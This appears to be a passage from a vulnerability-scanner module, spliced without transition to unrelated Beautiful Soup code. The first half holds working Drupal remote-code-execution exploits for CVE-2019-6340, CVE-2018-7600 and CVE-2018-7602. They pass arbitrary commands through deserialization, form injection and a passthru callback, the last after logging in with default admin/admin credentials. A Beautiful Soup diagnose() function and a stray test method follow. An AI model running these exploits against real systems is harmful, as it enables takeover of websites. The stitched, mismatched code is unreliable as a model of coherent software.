                            "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2019_6340_poc(self):
        """Probe for CVE-2019-6340 (REST module deserialization RCE)."""
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "drupal core restful remote code execution"
        self.vul_info["vul_numb"] = "CVE-2019-6340"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2019-02-22"
        self.vul_info["vul_vers"] = "< 8.6.10"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \
                                    "函数而触发反序列化漏洞,进而导致任意代码执行。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        self.path = "/node/?_format=hal_json"
        # Echo a random token; finding it in the response proves execution.
        md = random_md5()
        cmd = "echo " + md
        self.cmd_len = len(cmd)
        self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                     self.url)
        # NOTE(review): this replaces self.headers for the whole instance,
        # not just this request -- later calls inherit these headers.
        self.headers = {
            'User-Agent': self.ua,
            'Connection': "close",
            'Content-Type': "application/hal+json",
            'Accept': "*/*",
            'Cache-Control': "no-cache"
        }
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                # NOTE(review): the payload is stored under "vul_urls";
                # "vul_payd" looks like the intended key -- confirm upstream.
                self.vul_info["vul_urls"] = self.payload
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2018_7600_exp(self, cmd):
        """Execute `cmd` via CVE-2018-7600 and print the raw exchange."""
        vul_name = "Drupal: CVE-2018-7600"
        self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
        self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            verify.exploit_print(request.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

    def cve_2018_7602_exp(self, cmd):
        """Execute `cmd` via CVE-2018-7602 (authenticated) and print the
        raw exchange. Uses hard-coded default admin/admin credentials."""
        vul_name = "Drupal: CVE-2018-7602"
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        try:
            # Step 1: authenticate.
            self.session = requests.Session()
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
                'pass': DRUPAL_P,
                'op': 'Log in'
            }
            self.session.post(self.url, params=self.get_params,
                              data=self.post_params, headers=self.headers,
                              timeout=self.timeout, verify=False)
            # Step 2: discover the numeric user id from the profile page.
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url, params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {
                'property': 'foaf:name'
            }).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            # Step 3: fetch the account-cancel form and its CSRF token.
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url, params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {
                'name': 'form_token'
            }).get('value')
            # Step 4: submit with the injected `destination` carrying the command.
            self.get_params = {
                'q': self.user_id + '/cancel',
                'destination': self.user_id +
                '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account'
            }
            self.r = self.session.post(self.url, params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {
                'name': 'form_build_id'
            }).get('value')
            # Step 5: trigger the poisoned form via the file/ajax callback.
            self.get_params = {
                'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout, verify=False)
            self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
            verify.exploit_print(self.r.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

    def cve_2019_6340_exp(self, cmd):
        """Execute `cmd` via CVE-2019-6340 and print the raw exchange."""
        vul_name = "Drupal: CVE-2019-6340"
        self.path = "/node/?_format=hal_json"
        self.cmd_len = len(cmd)
        self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                     self.url)
        # NOTE(review): replaces self.headers for the whole instance.
        self.headers = {
            'User-Agent': self.ua,
            'Connection': "close",
            'Content-Type': "application/hal+json",
            'Accept': "*/*",
            'Cache-Control': "no-cache"
        }
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            verify.exploit_print(request.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
def diagnose(data):
    """Diagnostic suite for isolating common problems.

    :param data: A string containing markup that needs to be explained.
    :return: None; diagnostics are printed to standard output.
    """
    print("Diagnostic running on Beautiful Soup %s" % __version__)
    print("Python version %s" % sys.version)

    basic_parsers = ["html.parser", "html5lib", "lxml"]
    # BUG FIX: iterate over a snapshot. Removing from the list being
    # iterated used to skip the element right after each removed parser,
    # so a missing parser could go unreported.
    for name in list(basic_parsers):
        for builder in builder_registry.builders:
            if name in builder.features:
                break
        else:
            basic_parsers.remove(name)
            print(("I noticed that %s is not installed. Installing it may help." % name))

    if 'lxml' in basic_parsers:
        basic_parsers.append("lxml-xml")
        try:
            from lxml import etree
            print("Found lxml version %s" % ".".join(map(str, etree.LXML_VERSION)))
        except ImportError:
            print("lxml is not installed or couldn't be imported.")

    if 'html5lib' in basic_parsers:
        try:
            from thirdparty import html5lib
            print("Found html5lib version %s" % html5lib.__version__)
        except ImportError:
            print("html5lib is not installed or couldn't be imported.")

    if hasattr(data, 'read'):
        # A file-like object: read the markup out of it.
        data = data.read()
    elif data.startswith("http:") or data.startswith("https:"):
        print('"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data)
        print(
            "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
        )
        return
    else:
        try:
            if os.path.exists(data):
                print(
                    '"%s" looks like a filename. Reading data from the file.'
                    % data)
                with open(data) as fp:
                    data = fp.read()
        except ValueError:
            # This can happen on some platforms when the 'filename' is
            # too long. Assume it's data and not a filename.
            pass
    print()

    # Run the markup through every available parser and show the result.
    for parser in basic_parsers:
        print("Trying to parse your markup with %s" % parser)
        success = False
        try:
            soup = BeautifulSoup(data, features=parser)
            success = True
        except Exception:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("Here's what %s did with the markup:" % parser)
            print(soup.prettify())
        print("-" * 80)
def test_no_warning_if_explicit_parser_specified(self):
    """Naming "html.parser" explicitly should produce zero warnings."""
    with warnings.catch_warnings(record=True) as caught:
        BeautifulSoup("<a><b></b></a>", "html.parser")
        self.assertEqual([], caught)